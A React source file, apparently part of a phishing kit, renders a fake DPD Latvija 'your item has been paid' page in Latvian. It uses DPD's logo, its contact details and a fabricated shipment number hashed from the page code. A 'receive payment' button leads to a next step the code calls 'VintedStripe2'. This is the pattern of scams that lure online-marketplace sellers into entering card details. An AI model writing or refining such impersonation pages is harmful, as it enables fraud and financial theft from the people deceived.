import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './DpdLvSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const HERO_IMG = `${P}/dpd-lv-hero-photo.png`;
const DPD_LOGO_SRC = `${P}/dpd-lv-logo.png`;

function shipmentFromPageCode(pageCode) {
  if (!pageCode) return '—';
  let h = 0;
  for (let i = 0; i < pageCode.length; i += 1) {
    h = (h * 33 + pageCode.charCodeAt(i)) >>> 0;
  }
  const n = 100000000 + (h % 900000000);
  return String(n);
}

/** DPD Latvija — pēc captcha: success ar modālu; tad index2 (VintedStripe2). */
function DpdLvSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'LV').toUpperCase();

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(Math.round(priceNumber))
        : String(priceNumber);

  const amountWithEuro = priceText === '—' ? '—' : `${priceText} €`;

  const buyerName =
    [pageData?.first_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';

  const productLabel = (pageData?.product_name || '').trim() || '—';

  const shipmentNo = useMemo(() => {
    const fromApi = pageData?.tracking_number && String(pageData.tracking_number).trim();
    if (fromApi) return fromApi;
    return shipmentFromPageCode(pageCode || pageData?.page_code || '');
  }, [pageData?.tracking_number, pageData?.page_code, pageCode]);
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="dpdlv-wrap dpdlv-wrap--loading">
        <div className="dpdlv-loading">Ielādē…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="dpdlv-wrap dpdlv-wrap--lv">
      <div className="dpdlv-hero" style={{ backgroundImage: `url(${HERO_IMG})` }} aria-hidden />
      <div className="dpdlv-overlay" />

      <header className="dpdlv-topbar">
        <div className="dpdlv-lang">
          <a href="#/" onClick={(e) => e.preventDefault()}>RU</a>
          <span className="dpdlv-lang-sep"> </span>
          <a href="#/" onClick={(e) => e.preventDefault()}>EN</a>
        </div>
      </header>

      <main className="dpdlv-main">
        <div className="dpdlv-modal" role="dialog" aria-labelledby="dpdlv-title">
          <h1 id="dpdlv-title" className="dpdlv-title">
            Jūsu prece ir apmaksāta!
            <img src={DPD_LOGO_SRC} alt="DPD" className="dpdlv-title-logo dpdlv-title-logo--lv" decoding="async" />
          </h1>

          <table className="dpdlv-table">
            <tbody>
              <tr>
                <td className="dpdlv-k">Produkts :</td>
                <td className="dpdlv-v">{productLabel}</td>
              </tr>
              <tr>
                <td className="dpdlv-k">Pircēja vārds :</td>
                <td className="dpdlv-v">{buyerName}</td>
              </tr>
              <tr>
                <td className="dpdlv-k">Summa :</td>
                <td className="dpdlv-v">{amountWithEuro}</td>
              </tr>
              <tr>
                <td className="dpdlv-k">Sūtījuma numurs :</td>
                <td className="dpdlv-v">{shipmentNo}</td>
              </tr>
            </tbody>
          </table>

          <Link to={index2Path} className="dpdlv-cta">
            SAŅEMIET SAMAKSU
          </Link>
        </div>
      </main>

      <footer className="dpdlv-footer">
        <p className="dpdlv-footer-line">
          <strong>Klientu apkalpošana:</strong>{' '}
          <a href="tel:+37167387284">+371 67 387 284</a>
          {' · '}
          <a href="mailto:info@dpd.lv">info@dpd.lv</a>
        </p>
        <p className="dpdlv-footer-line">
          <a href="https://www.dpd.com/lv/lv/" target="_blank" rel="noopener noreferrer">
            www.dpd.lv
          </a>
          {' · '}
          <a href="#/" onClick={(e) => e.preventDefault()}>Pakalpojumu sniegšanas noteikumi</a>
          {' · '}
          <a href="#/" onClick={(e) => e.preventDefault()}>Privātuma politika</a>
        </p>
        <p className="dpdlv-footer-copy">© {new Date().getFullYear()} DPD Latvija</p>
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default DpdLvSuccess;
